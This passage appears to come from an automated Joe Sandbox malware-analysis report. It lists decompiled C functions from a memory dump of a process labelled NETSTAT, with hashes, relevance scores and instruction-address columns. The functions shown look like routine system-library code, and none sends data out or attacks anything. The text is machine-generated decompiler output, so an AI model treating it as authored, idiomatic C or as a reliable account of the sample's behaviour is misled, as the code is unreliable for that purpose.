                0x033552e9
                0x0335530e
                0x00000000

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 52dd8cb1d96dcdd6eab67c2dffae9efcd7f2b9cd58205d153613845e0b1586aa
                • Instruction ID: 55358ed8332566a8b7d3e1dff175b0bf348498fa2dd9e5bff6049e57a8952765
                • Opcode Fuzzy Hash: 52dd8cb1d96dcdd6eab67c2dffae9efcd7f2b9cd58205d153613845e0b1586aa
                • Instruction Fuzzy Hash: 0B51EE35605341AFE720EF64C980B6BBBE8FF44710F14492EF8A58BA50E770E805CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 03382AE4 Relevance: .2, Instructions: 159COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E03382AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x3448204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x3448208; // 0x3448207
				_t8 = _t57 + 0x3448208; // 0x3448207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x3448450; // 0xb310fc
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x344821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x3446d5c; // 0x7fc10654
							_t72 =  *0x3446d5c; // 0x7fc10654
							_t75 =  *0x3446d5c; // 0x7fc10654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x3446d5c; // 0x7fc10654
							_t84 =  *0x3446d5c; // 0x7fc10654
							_t87 =  *0x3446d5c; // 0x7fc10654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E0339F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                0x03382ae4
                0x03382aec
                0x03382aef
                0x03382af4
                0x03382af7
                0x03382afd
                0x03382b92
                0x03382b92
                0x03382b97
                0x03382b9c
                0x03382b9c
                0x03382b03
                0x03382b06
                0x03382b09
                0x03382b09
                0x03382b0f
                0x03382b15
                0x03382b15
                0x03382b1b
                0x03382b1e
                0x03382b21
                0x03382b26
                0x03382b29
                0x03382b81
                0x03382b84
                0x03382c0e
                0x03382c15
                0x03382c24
                0x03382c24
                0x03382b8a
                0x03382b8a
                0x03382b8a
                0x03382b8a
                0x03382b90
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x03382b4a
                0x03382b4a
                0x03382b4d
                0x03382b53
                0x00000000
                0x00000000
                0x03382b55
                0x03382b58
                0x03382bb7
                0x033c5d1b
                0x033c5d37
                0x033c5d47
                0x033c5d53
                0x03382bbd
                0x03382bbd
                0x03382bbd
                0x03382bb7
                0x03382b5d
                0x03382c2f
                0x033c5d5b
                0x033c5d77
                0x033c5d87
                0x033c5d93
                0x03382c35
                0x03382c35
                0x03382c35
                0x03382c2f
                0x03382b65
                0x03382b9f
                0x03382ba2
                0x03382b67
                0x03382b67
                0x03382b69
                0x03382b6b
                0x03382b6e
                0x03382bc9
                0x03382bcc
                0x03382bcf
                0x03382bd4
                0x03382bd6
                0x03382bd6
                0x03382bdb
                0x03382c02
                0x03382c05
                0x03382c07
                0x00000000
                0x03382c07
                0x03382be0
                0x03382c00
                0x03382c3f
                0x03382c3f
                0x00000000
                0x03382c00
                0x03382be5
                0x03382be7
                0x03382bec
                0x03382bf4
                0x03382bf6
                0x00000000
                0x03382bf6
                0x03382b70
                0x03382b76
                0x03382b2b
                0x03382b2b
                0x03382b2d
                0x03382b2f
                0x03382b32
                0x03382b35
                0x03382b3a
                0x00000000
                0x03382b40
                0x03382b43
                0x03382b45
                0x03382b47
                0x03382b4a
                0x03382b4d
                0x03382b53
                0x00000000
                0x00000000
                0x00000000
                0x03382b53
                0x03382b78
                0x03382b78
                0x03382b7b
                0x03382b7e
                0x00000000
                0x03382b7e
                0x03382b76
                0x03382ba5
                0x03382ba5
                0x03382ba8
                0x03382bad
                0x00000000
                0x00000000
                0x03382baf
                0x03382baf
                0x03382bc2
                0x00000000

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a7b3c802fd695b56806d352ac7a5af52e9ca967ca809d5fff82ef37fd1d679e4
                • Instruction ID: 98143c3e0ca86cc4f0060a99ed40fe6ef9d7d142939701258a3bace99cea54b6
                • Opcode Fuzzy Hash: a7b3c802fd695b56806d352ac7a5af52e9ca967ca809d5fff82ef37fd1d679e4
                • Instruction Fuzzy Hash: 8D51D4BAE002158FCB15EF1DC8C09BEB7F5FB88700716896AE846EB314D734AA51C790
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0337DBE9 Relevance: .1, Instructions: 149COMMON
                Download Yara Rule
                C-Code - Quality: 86%
                			E0337DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E0335CC50(E03354510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E03377D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E03428ED6(_t102, _t98);
						}
						_t76 = _v44;
						E03372280(_t58, _v44);
						E0337DD82(_v44, _t102, _t98);
						E0337B944(_t102, _v5);
						return E0336FFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x3448628; // 0x0
							_v28 = _t67;
							_t68 =  *0x344862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x3448628; // 0x0
						_t105 = _v28;
						_t80 =  *0x344862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x341fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}









































                0x0337dbe9
                0x0337dbf2
                0x0337dbf7
                0x0337dbf9
                0x0337dbfc
                0x0337dc00
                0x0337dc03
                0x0337dc14
                0x0337dd54
                0x0337dd54
                0x0337dd54
                0x0337dc18
                0x0337dc1d
                0x0337dc1d
                0x0337dc32
                0x0337dc3b
                0x0337dc3e
                0x0337dc46
                0x0337dd5b
                0x0337dd62
                0x0337dd64
                0x0337dd67
                0x0337dd69
                0x0337dd6b
                0x0337dd6e
                0x0337dd70
                0x0337dd73
                0x0337dd73
                0x00000000
                0x0337dc4c
                0x0337dc4e
                0x033c3ae3
                0x033c3ae8
                0x033c3aea
                0x0337dce7
                0x0337dce9
                0x0337dcec
                0x0337dcee
                0x0337dcf0
                0x0337dcf3
                0x0337dcf5
                0x033c3af2
                0x033c3af5
                0x033c3af5
                0x0337dd06
                0x0337dd08
                0x0337dd0b
                0x0337dd12
                0x033c3b08
                0x0337dd18
                0x0337dd18
                0x0337dd18
                0x0337dd20
                0x0337dd23
                0x033c3b16
                0x033c3b16
                0x0337dd29
                0x0337dd2d
                0x0337dd36
                0x0337dd40
                0x0337dd51
                0x0337dd51
                0x0337dc54
                0x0337dc59
                0x0337dc59
                0x0337dc5e
                0x0337dc5e
                0x0337dc63
                0x0337dc66
                0x0337dc6b
                0x0337dc78
                0x0337dc7b
                0x0337dc81
                0x0337dc81
                0x0337dc83
                0x0337dc89
                0x00000000
                0x00000000
                0x0337dd7b
                0x0337dd7b
                0x0337dc8f
                0x0337dc8f
                0x0337dc92
                0x0337dc99
                0x0337dc9f
                0x0337dca5
                0x0337dcaa
                0x0337dcaa
                0x0337dcb3
                0x0337dcb8
                0x0337dcbb
                0x0337dcc1
                0x0337dccf
                0x0337dcd2
                0x0337dcd5
                0x0337dcd7
                0x0337dcda
                0x0337dcdc
                0x0337dcdc
                0x0337dce2
                0x0337dce4
                0x00000000
                0x0337dce4

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d2aab0c487d650b51220ed0d22d2f3b69bdf85d403f8d3c4ce42ba328474d44f
                • Instruction ID: e2960742466cfaa7f9565095a0fdc7fda692c11e077712e58f40017a001a40b6
                • Opcode Fuzzy Hash: d2aab0c487d650b51220ed0d22d2f3b69bdf85d403f8d3c4ce42ba328474d44f
                • Instruction Fuzzy Hash: 53519E79E00645CFCB24DF68C8C0AAEFBF5BF48310F24819AD955AB344DB39A944CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0336EF40 Relevance: .1, Instructions: 147COMMON
                Download Yara Rule
                C-Code - Quality: 96%
                			E0336EF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E03359080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x77cfc21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E03352D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                0x0336ef4b
                0x0336ef4d
                0x0336ef57
                0x0336f0bd
                0x0336f0c2
                0x0336f0d2
                0x0336f0d2
                0x0336f0c2
                0x0336ef5d
                0x0336ef5f
                0x0336ef67
                0x0336ef6a
                0x0336ef6d
                0x0336ef74
                0x0336ef7f
                0x0336ef82
                0x0336ef82
                0x0336ef86
                0x0336ef88
                0x0336ef8c
                0x0336ef8f
                0x0336ef8f
                0x0336ef8f
                0x00000000
                0x0336ef91
                0x0336ef93
                0x0336efc4
                0x0336efc4
                0x0336efc4
                0x0336efca
                0x0336efd0
                0x0336f0a6
                0x00000000
                0x00000000
                0x0336f0af
                0x033bbb06
                0x033bbb0a
                0x0336f0b5
                0x0336f0b5
                0x0336f0b5
                0x0336f0b5
                0x00000000
                0x0336efd6
                0x0336efd9
                0x0336f0de
                0x0336f0e2
                0x0336efdf
                0x0336efdf
                0x0336efdf
                0x0336efe5
                0x033bbafc
                0x033bbafc
                0x0336efe5
                0x0336efeb
                0x0336efed
                0x0336f00f
                0x0336f011
                0x0336f01a
                0x0336f01d
                0x0336f021
                0x0336f028
                0x0336f029
                0x0336f029
                0x0336f02c
                0x00000000
                0x0336f02c
                0x0336eff3
                0x0336eff9
                0x0336f0ea
                0x0336f0ed
                0x0336f0ef
                0x00000000
                0x0336f0ef
                0x0336f003
                0x033bbb12
                0x0336f045
                0x0336f049
                0x0336f051
                0x0336f09e
                0x0336f0a0
                0x0336f0a0
                0x0336f09e
                0x0336f053
                0x0336f064
                0x0336f064
                0x0336f06b
                0x033bbb1a
                0x033bbb1a
                0x0336f071
                0x0336f071
                0x0336f07d
                0x0336f082
                0x0336f08f
                0x0336f08f
                0x0336f009
                0x0336f00d
                0x00000000
                0x0336f00d
                0x0336efd0
                0x0336ef97
                0x0336efa5
                0x0336efaa
                0x00000000
                0x0336efac
                0x0336efac
                0x0336efac
                0x00000000
                0x0336efb2
                0x0336f036
                0x0336f03a
                0x0336f040
                0x0336f090
                0x00000000
                0x0336f092
                0x0336f042
                0x00000000
                0x0336f042
                0x0336efb7
                0x0336efb9
                0x0336efbc
                0x0336efb0
                0x0336efb0
                0x00000000
                0x0336efbe
                0x0336efbe
                0x0336efc1
                0x00000000
                0x0336efc1
                0x0336efbc
                0x0336efaa
                0x0336ef91

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                • Instruction ID: 6b1f53cb3fbb7724f399761db821b77304ff874a2f9bed1092741c1d06a797f4
                • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                • Instruction Fuzzy Hash: 00512434E04645EFDB10CB68DAC07EEFBB9AF05304F1CC2A8D4559B289C379A989C741
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0342740D Relevance: .1, Instructions: 141COMMON
                Download Yara Rule
                C-Code - Quality: 84%
                			E0342740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E033AD4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E0339F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L03374620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L03374620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E0339F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L03374620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                0x0342740d
                0x0342740d
                0x03427412
                0x03427413
                0x03427416
                0x03427418
                0x0342741c
                0x0342741f
                0x03427422
                0x03427422
                0x03427428
                0x0342742a
                0x0342742a
                0x03427451
                0x03427432
                0x0342744f
                0x0342744f
                0x00000000
                0x03427434
                0x03427438
                0x03427443
                0x03427517
                0x03427517
                0x0342751a
                0x03427535
                0x03427520
                0x03427527
                0x0342752c
                0x03427531
                0x03427533
                0x00000000
                0x03427533
                0x00000000
                0x03427531
                0x0342754b
                0x0342754f
                0x0342755c
                0x0342755c
                0x0342755f
                0x03427560
                0x03427561
                0x03427562
                0x03427563
                0x03427568
                0x0342756a
                0x0342756c
                0x0342756d
                0x0342756d
                0x0342756f
                0x03427572
                0x03427574
                0x03427577
                0x0342757c
                0x0342757f
                0x00000000
                0x03427551
                0x03427551
                0x03427551
                0x03427553
                0x03427553
                0x03427449
                0x03427449
                0x0342744c
                0x0342744c
                0x00000000
                0x0342744c
                0x03427443
                0x0342750e
                0x03427514
                0x03427514
                0x03427455
                0x03427469
                0x0342746d
                0x00000000
                0x03427473
                0x03427473
                0x03427476
                0x03427480
                0x03427484
                0x0342748e
                0x03427493
                0x03427493
                0x03427496
                0x03427499
                0x034274a1
                0x034274b1
                0x034274b5
                0x00000000
                0x034274bb
                0x034274c1
                0x034274c1
                0x034274c4
                0x034274c5
                0x034274c6
                0x034274c7
                0x034274c8
                0x034274cd
                0x00000000
                0x034274d3
                0x034274d3
                0x034274d6
                0x034274d8
                0x034274db
                0x034274dd
                0x034274e0
                0x034274e7
                0x034274ee
                0x034274ee
                0x034274f4
                0x034274f9
                0x00000000
                0x034274fb
                0x034274fb
                0x034274fd
                0x03427500
                0x03427503
                0x03427505
                0x03427505
                0x034274f9
                0x00000000
                0x034274cd
                0x034274b5
                0x00000000

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
